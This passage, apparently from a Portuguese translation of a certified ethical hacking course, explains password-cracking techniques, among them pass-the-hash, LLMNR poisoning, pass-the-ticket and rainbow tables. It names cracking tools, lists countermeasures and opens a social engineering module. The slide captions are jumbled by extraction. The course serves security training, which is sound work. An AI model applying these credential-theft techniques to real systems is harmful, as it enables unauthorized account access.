específicas para extrair a senha rapidamente.
Ao obter informações úteis, como o método em que os números e/ou caracteres especiais foram usados e o
tamanho da senha, os invasores podem minimizar o tempo necessário para quebrar a senha e, portanto, aprimorar
a ferramenta de quebra. Essa técnica envolve força bruta, um dicionário e ataques de sílabas.
Para ataques online de quebra de senha, um invasor às vezes usa uma combinação de força bruta e um dicionário.
Essa combinação se enquadra nas categorias de ataques de quebra de senha híbridos e silábicos.
o Ataque Híbrido
Este tipo de ataque depende do ataque de dicionário. Freqüentemente, as pessoas alteram suas senhas
apenas adicionando alguns números às suas senhas antigas. Nesse caso, o programa adicionaria alguns
números e símbolos às palavras do dicionário para tentar decifrar a senha. Por exemplo, se a senha antiga for
“sistema”, existe a chance de a pessoa alterá-la para “sistema1” ou “sistema2”.

o Ataque de sílaba
Os hackers usam essa técnica de cracking quando as senhas não são palavras conhecidas.
Os invasores usam o dicionário e outros métodos para quebrá-los, bem como todas as
combinações possíveis deles.

Adivinhar senha
O invasor cria uma lista de todas as senhas possíveis a

A frequência dos ataques é menor partir das informações coletadas por meio de engenharia A taxa de falha é alta
social ou de qualquer outra forma e as insere
manualmente na máquina da vítima para decifrar as
senhas
1 2 3 4
Encontre um usuário válido Crie uma lista de Classifique as Digite cada
senhas senhas de alta a senha, até que a senha
possíveis baixa probabilidade correta seja descoberta
Adivinhar senha
A adivinhação de senha é uma técnica de quebra de senha que envolve tentar fazer logon no sistema de
destino com senhas diferentes manualmente. Adivinhar é o elemento-chave da quebra de senha manual. O
invasor cria uma lista de todas as senhas possíveis a partir das informações coletadas por meio de engenharia
social ou qualquer outro método e as tenta manualmente na máquina da vítima para decifrar as senhas.
A seguir estão as etapas envolvidas na adivinhação de senha:

ÿ Encontre um usuário válido
ÿ Crie uma lista de possíveis senhas
ÿ Classifique as senhas de alta a baixa probabilidade
ÿ Digite cada senha, até que a senha correta seja descoberta
Os hackers podem quebrar senhas manualmente ou usando ferramentas, métodos e algoritmos automatizados.
Eles também podem automatizar a quebra de senha usando um loop FOR simples ou criar um arquivo de script
que tenta cada senha em uma lista. Essas técnicas ainda são consideradas cracking manual. A taxa de falha
desse tipo de ataque é alta.

Senhas Padrão
ÿ Uma senha padrão é uma senha fornecida pelo
fabricante com novos equipamentos (por
exemplo, comutadores, hubs, roteadores) que
é protegida por senha
ÿ Os invasores usam senhas padrão presentes na

lista de palavras ou dicionário para executar o
ataque de adivinhação de senha
Ferramentas on-line para pesquisar padrão

senhas
ÿ https:// www.fortypoundhead.com
ÿ https:// cirt.net ÿ http://
www.defaultpassword.us ÿ https://
www.routerpasswords.com ÿ https://
https:// open-sez.me
default-password.info
Senhas padrão
As senhas padrão são aquelas fornecidas pelos fabricantes com novos equipamentos (por exemplo, switches, hubs,
roteadores). Normalmente, as senhas padrão fornecidas pelos fabricantes de dispositivos protegidos por senha
permitem que o usuário acesse o dispositivo durante a configuração inicial e, em seguida, altere a senha. No entanto,
muitas vezes um administrador se esquece de definir a nova senha ou ignora a recomendação de alteração de senha
e continua usando a senha original.
Os invasores podem explorar esse lapso e encontrar a senha padrão do dispositivo de destino nos sites dos
fabricantes ou usando ferramentas online que mostram senhas padrão para acessar o dispositivo de destino com
sucesso. Os invasores usam senhas padrão na lista de palavras ou dicionário que usam para realizar ataques de
adivinhação de senha.
A seguir estão algumas das ferramentas online para pesquisar senhas padrão:
ÿ https:// open-sez.me
ÿ https:// www.fortypoundhead.com
ÿ https:// cirt.net
ÿ http:// www.defaultpassword.us
ÿ https:// www.routerpasswords.com
ÿ https:// default-password.info

Figura 4.2: Captura de tela mostrando as senhas padrão

Cavalos de Tróia/Spyware/Keyloggers
O invasor infecta o PC local da vítima

A vítima faz logon no servidor de
com Trojan/spyware/keylogger
domínio com suas credenciais
Trojan/spyware/keylogger
envia credenciais de login ao
invasor Vítima
Atacante servidor de domínio
O invasor obtém acesso ao servidor de domínio
ÿ O invasor instala um Trojan/Spyware/Keylogger na máquina da vítima para coletar o

nomes de usuário e senhas da vítima
ÿ O Trojan/Spyware/Keylogger é executado em segundo plano e envia de volta todas as credenciais do usuário

para o atacante
Cavalos de Tróia/Spyware/Keyloggers
Um Trojan é um programa que se mascara como um aplicativo benigno. O software inicialmente parece executar
uma função desejável ou benigna, mas, em vez disso, rouba informações ou danifica o sistema.
Com um Trojan, os invasores podem obter acesso remoto e realizar várias operações limitadas por privilégios de
usuário no computador de destino.
Spyware é um tipo de malware que os invasores instalam em um computador para coletar secretamente
informações sobre seus usuários sem que eles saibam. O spyware se esconde do usuário e pode ser difícil de
detectar.
Um keylogger é um programa que registra todas as teclas digitadas pelo usuário sem o conhecimento do usuário.
Os keyloggers enviam o registro das teclas digitadas pelo usuário para a máquina do invasor ou o ocultam na
máquina da vítima para recuperação posterior. O invasor então examina o log para encontrar senhas ou outras
informações úteis que possam comprometer o sistema.
Um invasor instala um Trojan/spyware/keylogger na máquina da vítima para coletar seus nomes de usuário e
senhas. Esses programas são executados em segundo plano e enviam de volta todas as credenciais do usuário
ao invasor.
Por exemplo, um key logger no computador da vítima pode revelar o conteúdo de todos os e-mails do usuário. A
imagem a seguir descreve um cenário que descreve como um invasor obtém acesso por senha usando um
Trojan/spyware/keylogger.

Figura 4.3: Ataque online ativo usando Trojan/spyware/keylogger

Ataque de injeção de hash/Pass-the-Hash (PtH)

Um ataque de injeção de hash/PtH permite que um invasor injete um hash
comprometido em uma sessão local e use o hash para validar recursos de rede
O invasor encontra e extrai um hash de conta de administrador de domínio conectado
O invasor usa o hash extraído para fazer logon no controlador de domínio
Compromete o servidor
Os hashes de logon são usando um exploit local/remoto
armazenados no arquivo SAM
O usuário faz logon

Extrai um hash de conta de
administrador de domínio conectado
Servidor de usuário
(Controlador de domínio)
Injetar um hash comprometido em uma sessão local
Computador do usuário Atacante
Ataque de injeção de hash/Pass-the-Hash (PtH)
Esse tipo de ataque é possível quando o sistema de destino usa uma função hash como parte do processo
de autenticação para autenticar seus usuários. Geralmente, o sistema armazena valores de hash das
credenciais no banco de dados/arquivo SAM em um computador Windows. Nesses casos, o servidor calcula
o valor de hash das credenciais enviadas pelo usuário ou permite que o usuário insira o valor de hash
diretamente. O servidor então o compara com o valor de hash armazenado para autenticação.
Figura 4.4: Ataque de injeção de hash
Os invasores exploram esses mecanismos de autenticação e primeiro exploram o servidor de destino para
recuperar os hashes dos bancos de dados SAM. Eles então inserem os hashes adquiridos diretamente no
mecanismo de autenticação para autenticar com os hashes pré-computados roubados do usuário. Assim,
em um ataque de injeção de hash/PtH, os invasores injetam um hash LanMan (LM) ou NTLM comprometido
em uma sessão local e, em seguida, usam o hash para autenticar os recursos de rede. Qualquer servidor ou
serviço (em execução no Windows, UNIX ou qualquer outro sistema operacional) usando autenticação NTLM
ou LM é suscetível a esse ataque. Esse ataque pode ser iniciado em qualquer sistema operacional, mas o
Windows pode ser mais vulnerável devido ao recurso Single-Sign-On (SSO), que armazena senhas dentro
do sistema e permite que os usuários acessem todos os recursos com um único login.

Envenenamento LLMNR/NBT-NS
ÿ LLMNR e NBT-NS são os dois principais elementos dos sistemas operacionais Windows usados
para executar resolução de nomes para hosts presentes no mesmo link
ÿ O invasor quebra o hash NTLMv2 obtido do processo de autenticação da vítima
ÿ As credenciais extraídas são usadas para fazer logon no sistema host na rede
O usuário executa
Transmissão LLMNR/
NBT-NS para
saber se alguém
Anfitrião 1
sabe
\\DtaServr
Usuário envia nome de host
incorreto – \\DtaServr
Hospedeiro 2
\\DtaServr – NÃO ENCONTRADO

Do utilizador
Dados
Servidor Hospedeiro 3
Atacante responde dizendo que

conhece \\DtaServr, aceita hash
NTLMv2 e depois envia uma MSG de

ERRO
Atacante
Envenenamento LLMNR/NBT-NS
LLMNR (Link Local Multicast Name Resolution) e NBT-NS (NetBIOS Name Service) são dois elementos principais dos sistemas
operacionais Windows usados para executar a resolução de nomes para hosts presentes no mesmo link. Esses serviços são
ativados por padrão nos sistemas operacionais Windows.
Quando o servidor DNS falha em resolver consultas de nomes, o host executa uma transmissão UDP não autenticada
perguntando a todos os hosts se alguém tem um nome que está procurando. Como o host que está tentando se conectar está
seguindo um processo não autenticado e de transmissão, torna-se fácil para um invasor ouvir passivamente uma rede para
transmissões LLMNR (porta UDP 5355) e NBT-NS (porta UDP 137) e responder à solicitação fingindo ser um host de destino.
Depois de aceitar uma conexão com um host, o invasor pode utilizar ferramentas como Responder.py ou Metasploit para
encaminhar a solicitação a um servidor não autorizado (por exemplo, TCP: 137) para realizar um processo de autenticação.
Durante o processo de autenticação, o invasor envia um hash NTLMv2 para o servidor invasor, obtido do host que está
tentando se autenticar. Esse hash é armazenado em um disco e pode ser quebrado usando ferramentas de quebra de hash
offline, como hashcat ou John the Ripper. Depois de quebradas, essas credenciais podem ser usadas para fazer login e obter
acesso ao sistema host legítimo.
Etapas envolvidas no envenenamento por LLMNR/NBT-NS:
1. O usuário envia uma solicitação para se conectar ao sistema de compartilhamento de dados, \\DataServer, que
ela erroneamente digitou como \\DtaServr.
2. O \\DataServer responde ao usuário, dizendo que não conhece o host nomeado

\\DtaServr.

3. O usuário então realiza uma transmissão LLMNR/NBT-NS para descobrir se alguém na rede
conhece o nome do host\\DtaServr.
4. O invasor responde ao usuário dizendo que é \\DataServer, aceita o usuário NTLMv2

hash e responde ao usuário com um erro.
Figura 4.5: ataque de envenenamento LLMNR/NBT-NS

Passe o Ataque do Ticket
Pass the Ticket é uma técnica usada para autenticar um

usuário em um sistema que usa Kerberos sem fornecer a senha
do usuário
Para executar esse ataque, o invasor despeja tíquetes Kerberos de

contas legítimas usando ferramentas de despejo de credenciais
O invasor então lança um ataque de passagem de ticket roubando o

ST/TGT de uma máquina do usuário final ou roubando o
ST/TGT de um servidor de autorização comprometido
O invasor usa o ticket recuperado para obter acesso não autorizado aos
serviços de rede de destino
Ferramentas como Mimikatz, Rubeus e Windows Credentials Editor são usadas

por invasores para lançar esses ataques
Passe o Ataque do Ticket
Pass-the-ticket é uma técnica usada para autenticar um usuário em um sistema que está usando tickets Kerberos
sem fornecer a senha do usuário. A autenticação Kerberos permite que os usuários acessem serviços fornecidos
por servidores remotos sem a necessidade de fornecer senhas para cada serviço solicitado. Para executar esse
ataque, o invasor despeja tíquetes Kerberos de contas legítimas usando ferramentas de despejo de credenciais.
Um TGT ou ST pode ser capturado com base no nível de acesso permitido a um cliente. Aqui, o ST permite acesso
a recursos específicos, e o TGT é usado para enviar uma solicitação ao TGS para que o ST acesse todos os
serviços que o cliente foi autorizado a acessar.
Os Silver Tickets são capturados para recursos que utilizam Kerberos para o processo de autenticação e podem
ser usados para criar tickets para chamar um serviço específico e acessar o sistema que oferece o serviço.
Golden tickets são capturados para o domínio com o hash KDS KRBTGT NTLM que permite a criação de TGTs
para qualquer perfil no Active Directory.
Os invasores lançam ataques pass-the-ticket roubando o ST/TGT de uma máquina do usuário final e usando-o para
se disfarçar como um usuário válido ou roubando o ST/TGT de um AS comprometido. Depois de obter um desses
tickets, um invasor pode obter acesso não autorizado aos serviços de rede e procurar permissões adicionais e
dados críticos.
Os invasores usam ferramentas como Mimikatz, Rubeus, Windows Credentials Editor, etc., para lançar ataques
pass the ticket.

Cheiro de fio
Os invasores executam ferramentas de farejador de pacotes na rede local (LAN) para
acessar e registrar o tráfego de rede bruto
Os dados capturados podem incluir informações confidenciais , como senhas

(FTP, sessões de rlogin, etc.) e e-mails
Credenciais cheiradas são usadas para obter acesso não autorizado ao sistema de destino
Cheiro de fio Computacionalmente Complexo Difícil de perpetrar
Vítima Vítima
Atacante
Wire Sniffing
Packet sniffing é uma forma de sniffing ou escuta telefônica na qual os hackers detectam credenciais durante o
trânsito, capturando pacotes da Internet. Os invasores raramente usam sniffers para realizar esse tipo de
ataque. Com o sniffing de pacotes, um invasor pode obter senhas para aplicativos como e-mail, sites, SMB,
FTP, sessões de rlogin ou SQL. Enquanto os farejadores correm em segundo plano, a vítima permanece
inconsciente do cheiro.
Figura 4.6: Cheiro de fio
À medida que os farejadores coletam pacotes na camada de enlace de dados, eles podem capturar todos os
pacotes na LAN da máquina que executa o programa farejador. Este método é relativamente difícil de executar
e computacionalmente complicado. Isso ocorre porque uma rede com um hub implementa um meio de
transmissão que todos os sistemas compartilham na LAN. A LAN envia os dados para todas as máquinas
conectadas a ela. Se um invasor executa um sniffer em um sistema na LAN, ele pode coletar dados enviados
para e de qualquer outro sistema na LAN. A maioria das ferramentas sniffer é ideal para farejar dados em um
ambiente de hub. Essas ferramentas são sniffers passivos, pois esperam passivamente pela transferência de
dados antes de capturar as informações. Eles são eficientes na coleta imperceptível de dados da LAN. Os
dados capturados podem incluir senhas enviadas para sistemas remotos durante FTP, sessões de rlogin e
correio eletrônico. O invasor usa essas credenciais para obter acesso não autorizado ao sistema de destino. Há
uma variedade de ferramentas disponíveis na Internet para detecção passiva de fios.

Homem do Meio e
Repetir Ataques Considerações
ÿ Relativamente difícil
ÿ Em um ataque MITM, o invasor obtém acesso ao
de perpetrar
canais de comunicação entre a vítima e o servidor para
ÿ Deve ser confiável por um ou
extrair as informações necessárias
ambos os lados
ÿ Em um ataque de repetição, os pacotes e tokens de autenticação são ÿ Às vezes pode ser quebrado
capturados usando um sniffer. Depois que as informações relevantes são invalidando o tráfego
extraídas, os tokens são colocados de volta na rede para obter acesso
Conexão Original
Farejar MITM/Replay
Vítima Servidor web
Tráfego
Atacante
Ataques Man-in-the-Middle e Replay
Quando duas partes estão se comunicando, pode ocorrer um ataque man-in-the-middle (MITM), no qual um
terceiro intercepta uma comunicação entre as duas partes sem o conhecimento delas. O terceiro escuta o
tráfego e o repassa. Para fazer isso, o “man in the middle” tem que farejar de ambos os lados da conexão
simultaneamente. Em um ataque MITM, o invasor obtém acesso aos canais de comunicação entre a vítima
e o servidor para extrair as informações. Esse tipo de ataque é frequentemente usado em tecnologias sem
fio e telnet. Não é fácil implementar tais ataques devido aos números de sequência do TCP e à velocidade
da comunicação. Este método é relativamente difícil de perpetrar e às vezes pode ser quebrado invalidando
o tráfego.
Figura 4.7: Ataques Main-in-the-middle e replay
Em um ataque de repetição, os pacotes e tokens de autenticação são capturados usando um sniffer. Depois
que as informações relevantes são extraídas, os tokens são colocados de volta na rede para obter acesso.
O invasor usa esse tipo de ataque para reproduzir transações bancárias ou tipos semelhantes de
transferência de dados, na esperança de replicar e/ou alterar atividades, como depósitos ou transferências
bancárias.

Ataque Mesa Arco-Íris
Arco-íris Uma tabela pré-computada que contém listas de palavras como arquivos de dicionário, listas
1 Mesa de força bruta e seus valores de hash
Compare o O hash das senhas é capturado e comparado com a tabela de hash pré-computada. Se uma
2 Hashes correspondência for encontrada, a senha será quebrada
Fácil de É fácil recuperar senhas comparando os hashes de senha capturados com as tabelas pré
3 Recuperar -computadas
Hashes pré-computados
1 qazwed 4259cc34599c530b28a6a8f225d668590
hh021da c744b1716cbf8d4dd0ff4ce31a177151
9da8dasf 3cd696a8571a843cda453a229d741843
sodifo8sf c744b1716cbf8d4dd0ff4ce31a177151
Ataque Mesa Arco-Íris
Um ataque de tabela arco-íris usa a técnica criptanalítica de troca de tempo-memória, que requer menos tempo do
que outras técnicas. Ele usa informações já calculadas armazenadas na memória para quebrar a criptografia. No
ataque Rainbow Table, o invasor cria previamente uma tabela com todas as senhas possíveis e seus respectivos
valores de hash, conhecida como Rainbow Table. Os invasores usam ferramentas como o RainbowCrack para
executar o ataque Rainbow Table.
ÿ Rainbow Table: Uma Rainbow Table é uma tabela pré-computada que contém listas de palavras como
arquivos de dicionário e listas de força bruta e seus valores de hash. É uma tabela de pesquisa usada
especialmente para recuperar uma senha de texto simples de um texto cifrado. O invasor usa essa tabela
para procurar a senha e tenta recuperá-la dos hashes de senha.
ÿ Hashes computados: um invasor calcula o hash para obter uma lista de senhas possíveis e o compara com
a tabela de hash pré-computada (tabela do arco-íris). Se os invasores encontrarem uma correspondência,
eles podem quebrar a senha.
ÿ Comparar os hashes: um invasor captura o hash de uma senha e o compara com a tabela de hash pré-
computada. Se uma correspondência for encontrada, a senha será quebrada. É fácil recuperar senhas
comparando os hashes de senha capturados com as tabelas pré-computadas.
Exemplos de hashes pré-computados:
Figura 4.8: Hashes pré-computados

Fluxo do módulo

1 Técnicas

2 Ferramentas

3 Contramedidas
Ferramentas para quebrar senhas: L0phtCrack e ophcrack

Um cracker de senha do Windows baseado
Uma ferramenta projetada para auditar
L0phtCrackName crack em tabelas de arco-íris. Ele vem com uma
senhas e recuperar aplicativos
interface gráfica do usuário e é executado em várias plataformas
https:// www.l0phtcrack.com https:// ophcrack.sourceforge.io

Ferramentas para quebrar senhas

RainbowCrack
RainbowCrack quebra hashes com tabelas de arco-íris. Ele usa um algoritmo de troca de memória de tempo para quebrar hashes
John, o Estripador
https:// www.openwall.com
hashcat
https:// hashcat.net
THC-Hydra
https:// github.com
Medusa
http:// foofus.net
http:// project-rainbowcrack.com
Discutir ferramentas de quebra de senha

As ferramentas de quebra de senha permitem redefinir administrador local do Windows desconhecido ou
perdido, administrador de domínio e outras senhas de contas de usuário. No caso de senhas esquecidas, ele
ainda permite aos usuários acesso instantâneo ao computador bloqueado sem reinstalar o Windows.
Os invasores podem usar ferramentas de quebra de senha para quebrar as senhas do sistema de destino.
Esta seção discute algumas das ferramentas populares de quebra de senha.
ÿ L0phtCrack
Fonte: https:// www.l0phtcrack.com
L0phtCrack é uma ferramenta projetada para auditar senhas e recuperar aplicativos. Ele recupera
senhas perdidas do Microsoft Windows com a ajuda de um dicionário, híbrido, tabela de arco-íris e
ataques de força bruta, além de verificar a força da senha.
Conforme mostrado na captura de tela, os invasores usam o L0phtCrack para quebrar a senha do alvo
para obter acesso ao sistema.

Figura 4.9: Captura de tela do L0phtCrack
ÿ ofcrack
Fonte: https:// ophcrack.sourceforge.io
ophcrack é uma ferramenta de quebra de senha do Windows que usa tabelas de arco-íris para quebrar
senhas. Ele vem com uma interface gráfica do usuário (GUI) e roda em diferentes sistemas operacionais,
como Windows, Linux/UNIX, etc.
Conforme mostrado na captura de tela, os invasores usam ophcrack para realizar ataques de força
bruta e quebrar hashes de senha do sistema de destino.

Figura 4.10: Captura de tela do ophcrack
ÿ RainbowCrack
Fonte: http:// project-rainbowcrack.com
RainbowCrack quebra hashes com Rainbow Tables, usando um algoritmo de trade-off de memória de tempo.
Um cracker de força bruta tradicional quebra hash de uma maneira diferente daquela seguida por um cracker
de hash de compensação de tempo e memória. O cracker hash de força bruta tenta todos os textos simples
possíveis, um após o outro, durante o cracking. Em contraste, RainbowCrack pré-calcula todos os possíveis
pares de hash de texto simples no algoritmo de hash selecionado, conjunto de caracteres e comprimento de
texto simples com antecedência e os armazena em um arquivo “tabela arco-íris”. Pode levar muito tempo para
pré-computar as tabelas, mas uma vez que a pré-computação é concluída, é possível quebrar fácil e
rapidamente o texto cifrado nas tabelas do arco-íris.
Conforme mostrado na captura de tela, os invasores usam o RainbowCrack para quebrar os hashes de senha
do sistema de destino.

Figura 4.11: Captura de tela do RainbowCrack
Algumas ferramentas de quebra de senha são listadas a seguir:
ÿ John the Ripper (https:// www.openwall.com)

ÿ hashcat (https:// hashcat.net)
ÿ THC-Hydra (https:// github.com)
ÿ Medusa (http:// foofus.net)

Fluxo do módulo

1 Técnicas

2 Ferramentas

3 Contramedidas
Contramedidas de quebra de senha
Proibir o uso da mesma senha durante

1 2 Não permitir compartilhamento de senha
uma alteração de senha
Proibir o uso de senhas que podem Não use protocolos de texto simples
3 ser encontradas em um 4 e protocolos com criptografia fraca
dicionário
Defina a política de alteração de Não use nenhuma senha padrão do

5 6
senha para 30 dias sistema

Contramedidas de quebra de senha (continuação)
Torne as senhas difíceis de adivinhar, exigindo de 8 a 12

caracteres alfanuméricos , consistindo em uma Proibir o uso de senhas como data de nascimento,
7 10
combinação de letras maiúsculas e minúsculas, números e nome do cônjuge, filho ou animal de estimação
símbolos
Certifique-se de que os aplicativos não

Bloquear uma conta sujeita a muitas tentativas
8 armazenem senhas na memória nem as gravem em 11
incorretas de senha
discos em texto não criptografado
Use dois fatores ou multifatores

Use uma string aleatória (sal) como prefixo ou
9 12 autenticação, por exemplo, usando CAPTCHA para evitar
sufixo para a senha antes da criptografia
ataques automatizados
Discutir contramedidas de quebra de senha

As melhores práticas para proteção contra quebra de senha são listadas a seguir:
ÿ Habilite a auditoria de segurança da informação para monitorar e rastrear ataques de senha.
ÿ Não use a mesma senha durante a alteração de senha.
ÿ Não compartilhe senhas.
ÿ Não use senhas que podem ser encontradas em um dicionário.
ÿ Não use protocolos de texto não criptografado ou protocolos com criptografia fraca.
ÿ Defina a política de alteração de senha para 30 dias.
ÿ Evite armazenar senhas em um local inseguro.
ÿ Não use senhas padrão de nenhum sistema.
ÿ Torne as senhas difíceis de adivinhar usando de 8 a 12 caracteres alfanuméricos, com uma combinação de
letras maiúsculas e minúsculas, números e símbolos. Isso ocorre porque senhas fortes são difíceis de
adivinhar. Portanto, quanto mais complexa a senha, menos vulnerável ela fica a ataques.
ÿ Certifique-se de que os aplicativos não armazenem senhas na memória nem as gravem no disco em texto não
criptografado. As senhas são sempre vulneráveis a roubo se forem armazenadas na memória. Depois que a
senha é conhecida, é extremamente fácil para os invasores escalar seus direitos no aplicativo.
ÿ Use uma string aleatória (salt) como um prefixo ou sufixo de senha antes de executar a criptografia.
Isso anula a pré-computação e a memorização. Porque o sal costuma ser diferente

para cada indivíduo, é impraticável para os invasores construir tabelas com uma única versão criptografada de cada
senha candidata. Os sistemas UNIX geralmente usam um conjunto de 12 bits.
ÿ Nunca use informações pessoais (por exemplo, data de nascimento ou nome do cônjuge, filho ou animal de estimação)
para criar senhas. Caso contrário, torna-se muito fácil para aqueles próximos a você quebrar suas senhas.
ÿ Monitore os logs do servidor para ataques de força bruta em contas de usuário. Embora os ataques de força bruta
sejam difíceis de interromper, eles são facilmente detectáveis se o log do servidor da web for monitorado.
Para cada tentativa malsucedida de login, um código de status HTTP 401 é registrado nos logs do servidor web.
ÿ Bloqueie as contas que foram submetidas a muitas tentativas incorretas de senha.

Isso fornece proteção contra força bruta e ataques de adivinhação.
ÿ Realize uma auditoria periódica de senhas na organização.
ÿ Verifique qualquer aplicativo suspeito que armazene senhas na memória ou as grave

disco.
ÿ Sistemas não corrigidos podem redefinir senhas durante estouro de buffer ou ataques de negação de serviço. Certifique-
se de atualizar o sistema.
ÿ Examine se a conta está em uso, excluída ou desativada. Desative a conta do usuário se várias tentativas de login com
falha forem detectadas.
ÿ Habilitar bloqueio de conta com um certo número de tentativas, contador de tempo e bloqueio
duração.
ÿ Torne o BIOS do sistema protegido por senha, especialmente em dispositivos suscetíveis

a ameaças físicas, como servidores e laptops.
ÿ Use autenticação de dois fatores ou multifatores, por exemplo, use CAPTCHA para evitar
ataques automatizados em sistemas de informação críticos.
ÿ Proteja e controle o acesso físico aos sistemas para evitar ataques de senha offline.
ÿ Certifique-se de que os arquivos do banco de dados de senhas sejam criptografados e acessíveis apenas pelo sistema
administradores.
ÿ Mascarar a exibição de senhas na tela para evitar ataques de ombro.

Resumo do módulo
Este módulo discutiu a quebra de senha e a complexidade da
senha
Ele cobriu os mecanismos de autenticação da Microsoft
Ele também discutiu em detalhes vários tipos de ataques de senha
Demonstrou como usar ferramentas de quebra de senha
Finalmente, este módulo terminou com uma discussão detalhada sobre várias
contramedidas contra ataques de senha
No próximo módulo, discutiremos em detalhes várias técnicas de

engenharia social e contramedidas
Resumo do módulo
Este módulo discutiu a quebra de senha e a complexidade da senha. Ele também cobriu os mecanismos
de autenticação da Microsoft. Além disso, vários tipos de ataques de senha também foram discutidos e
demonstrou como usar ferramentas de cracking de senha. Por fim, o módulo terminou com uma discussão
detalhada sobre várias contramedidas contra ataques de senha.
No próximo módulo, discutiremos em detalhes as várias técnicas de engenharia social e

contramedidas.
MT
CE-Conselho
EC-Council
E
Ethical
HE
Hacking Essentials
Técnicas de Engenharia Social e

Contramedidas
Módulo 05
T éc n i ca s d e E n g en ha r i a S o c i a l e Co nt r am e d i d a s

Técnicas de Engenharia Social e Contramedidas
Ideia criativa
1 Compreendendo os conceitos de engenharia social
Compreendendo várias engenharias sociais

2
Técnicas
3 Entendendo as ameaças internas
4 Compreendendo o roubo de identidade
Entendendo Diferentes Engenharias Sociais

5 Contramedidas
Compreendendo diferentes ameaças internas e identidade

6 Contramedidas de Roubo
Este módulo fornece uma visão geral da engenharia social. Embora se concentre em falácias e defenda contramedidas
eficazes, os possíveis métodos de extração de informações de outro ser humano dependem da engenhosidade dos
invasores. As características dessas técnicas as tornam uma arte, mas a natureza psicológica de algumas delas as
torna uma ciência. O resultado final é que não há defesa pronta contra a engenharia social; apenas a vigilância constante
pode contornar as técnicas de engenharia social usadas pelos invasores.
Este módulo fornece uma visão sobre técnicas de engenharia social baseadas em humanos, computadores e dispositivos
móveis. Ele também discute várias ameaças internas, especialmente roubo de identidade, bem como possíveis
contramedidas.
ÿ Descrever conceitos de engenharia social
ÿ Realizar engenharia social usando várias técnicas
ÿ Descrever ameaças internas
ÿ Descrever roubo de identidade
ÿ Aplicar contramedidas de engenharia social
ÿ Aplicar conhecimento sobre ameaças internas e contramedidas contra roubo de identidade

Fluxo do módulo
01 03
Discutir redes sociais
Discutir ameaças internas
Conceitos de Engenharia e roubo de identidade
e suas Fases
04
02 Discutir Engenharia Social
Discutir redes sociais Contramedidas
Técnicas de Engenharia
Discutir conceitos de engenharia social e suas fases

Não existe um mecanismo de segurança único que possa proteger das técnicas de engenharia social
usadas pelos invasores. Apenas educar os funcionários sobre como reconhecer e responder a ataques
de engenharia social pode minimizar as chances de sucesso dos invasores. Antes de prosseguir com
este módulo, primeiro é necessário discutir vários conceitos de engenharia social.
Esta seção descreve a engenharia social, alvos comuns da engenharia social, o impacto do ataque em
uma organização, comportamentos vulneráveis a ataques, fatores que tornam as empresas vulneráveis
a ataques, por que a engenharia social é eficaz e as fases de um ataque de engenharia social.

O que é Engenharia Social?
ÿ A engenharia social é a arte de

convencer as pessoas a revelar
informações confidenciais
ÿ Os engenheiros sociais dependem do

fato de que as pessoas não estão
cientes das informações valiosas às quais
eles têm acesso e são descuidados
em protegê-lo
O que é Engenharia Social?
Antes de realizar um ataque de engenharia social, o invasor coleta informações sobre a organização-alvo de
várias fontes, como:
ÿ Os sites oficiais da organização, onde os IDs, nomes e endereços de e-mail dos funcionários
são compartilhadas
ÿ Anúncios da organização-alvo veiculados pela mídia revelam informações como

como produtos e ofertas.
ÿ Blogs, fóruns e outros espaços online onde os funcionários compartilham informações pessoais e
informações organizacionais.
Depois de coletar informações, um invasor executa ataques de engenharia social usando várias abordagens,
como representação, piggybacking, tailgating, engenharia social reversa e outros métodos.
A engenharia social é a arte de manipular as pessoas para divulgar informações confidenciais para usá-las
para realizar alguma ação maliciosa. Apesar das políticas de segurança, os invasores podem comprometer as
informações confidenciais de uma organização usando engenharia social, que visa a fraqueza das pessoas.
Na maioria das vezes, os funcionários nem percebem uma falha de segurança de sua parte e, inadvertidamente,
revelam as informações críticas da organização. Por exemplo, responder involuntariamente a perguntas de
estranhos ou responder a e-mails de spam.
Para ter sucesso, os invasores têm um interesse especial em desenvolver habilidades de engenharia social e
podem ser tão proficientes que as vítimas podem nem perceber a fraude. Os invasores sempre procuram
novas maneiras de acessar as informações. Eles também garantem que conhecem o perímetro da organização
e as pessoas em seu perímetro, como guardas de segurança, recepcionistas e funcionários de help-desk, para
explorar a supervisão humana. As pessoas se condicionaram a não desconfiar demais e

eles associam comportamentos e aparências específicos a entidades conhecidas. Por exemplo, um

homem de uniforme carregando uma pilha de pacotes para entrega será percebido como um
entregador. Com a ajuda de truques de engenharia social, os invasores conseguem obter
informações confidenciais, autorizações e detalhes de acesso das pessoas, enganando e
manipulando a vulnerabilidade humana.

Alvos Comuns da Engenharia Social
1 Recepcionistas e pessoal de help-desk
2 Executivos de suporte técnico
3 Administradores do sistema
4 Usuários e clientes
5 Fornecedores da Organização Alvo
6 Executivos seniores
Alvos Comuns da Engenharia Social
Um engenheiro social usa a vulnerabilidade da natureza humana como sua ferramenta mais eficaz. Normalmente,
as pessoas acreditam e confiam nos outros e obtêm satisfação ao ajudar os necessitados. Discutidos abaixo
estão os alvos mais comuns da engenharia social em uma organização:
ÿ Recepcionistas e pessoal do help-desk: Os engenheiros sociais geralmente têm como alvo o pessoal
do service desk ou help-desk, induzindo-os a divulgar informações confidenciais sobre a organização.
Para extrair informações, como número de telefone ou senha, o invasor primeiro conquista a confiança
do indivíduo com as informações. Ao ganhar sua confiança, o invasor os manipula para obter
informações valiosas. Recepcionistas e funcionários do help-desk podem prontamente compartilhar
informações se sentirem que estão fazendo isso para ajudar um
cliente.
ÿ Executivos de Suporte Técnico: Outro alvo dos engenheiros sociais são os executivos de suporte
técnico. Os engenheiros sociais podem adotar a abordagem de entrar em contato com os executivos
de suporte técnico para obter informações confidenciais, fingindo ser gerentes seniores, clientes,
fornecedores ou outras figuras.
ÿ Administradores do Sistema: Um administrador do sistema em uma organização é responsável pela

manutenção dos sistemas. Assim, eles podem ter informações críticas, como o tipo e a versão do
sistema operacional e as senhas do administrador, que podem ser úteis para um invasor no
planejamento de um ataque.
ÿ Usuários e Clientes: Os invasores podem abordar usuários e clientes da organização-alvo,

fingindo ser uma pessoa de suporte técnico para extrair informações confidenciais.

ÿ Fornecedores da organização de destino: os invasores também podem ter como alvo os fornecedores
da organização para obter informações críticas que podem ajudar na execução de ataques.
ÿ Executivos seniores: os invasores também podem abordar executivos seniores de vários departamentos,
como Finanças, RH e CxOs, para obter informações críticas sobre a organização.

Impacto do ataque de engenharia social em um

Organização
1 2 3
Perdas econômicas Danos de boa Perda de privacidade
vontade
4 5 6
Perigos do Ações judiciais e Fechamento
terrorismo arbitragem temporário ou
definitivo
Impacto do ataque de engenharia social em uma organização
